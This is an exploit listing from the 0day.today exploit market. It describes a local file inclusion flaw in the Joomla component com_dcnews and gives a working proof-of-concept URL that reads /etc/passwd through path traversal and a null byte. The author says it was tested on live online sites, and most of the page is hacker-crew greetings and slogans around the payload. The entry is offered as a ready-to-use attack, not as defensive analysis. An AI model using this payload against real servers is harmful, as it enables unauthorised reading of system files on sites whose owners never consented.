[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_dcnews LFI Vulnerability

Author
Th3 RDX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14769
Category
web applications
Date add
09-11-2010
Platform
php
=============================================
Joomla Component com_dcnews LFI Vulnerability
=============================================

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Joomla Component com_dcnews LFI Vulnerability
# Date: 6-11-2010
# Author: Th3 RDX
# Software Link: n/a
# Version: n/a
# Tested on: online Sites
# category: webapp/Joomla
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
Sonic , r0073r(inj3ct0r.com)                 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r,
str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           ......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
##############################################################################
%//
 
----- [ Founder ] -----
 
        Th3 RDX
 
----- [ E - mail ] -----
 
    th3rdx@gmail.com
 
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [Title] -----
 
Joomla Component com_dcnews LFI Vulnerability
 
----- [ Vendor ] -----
n/a
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [ Bug (s) ] -----
 
----- [ Local File Inclusion ] -----
 
=> [ EXPLOIT ]
 
http://server/index.php?option=com_dcnews&view=dcnews&controller=[LFI]
 
=> [ Example/POC ]
 
http://server/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00
 
                                                    %\\
##############################################################################
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
  
=> c0d3 for motherland, h4ck for motherland
  
==> i'm worst than a useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
 
Bug discovered : 06 November 2010
 
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
#End 0Day#



#  0day.today [2024-12-25]  #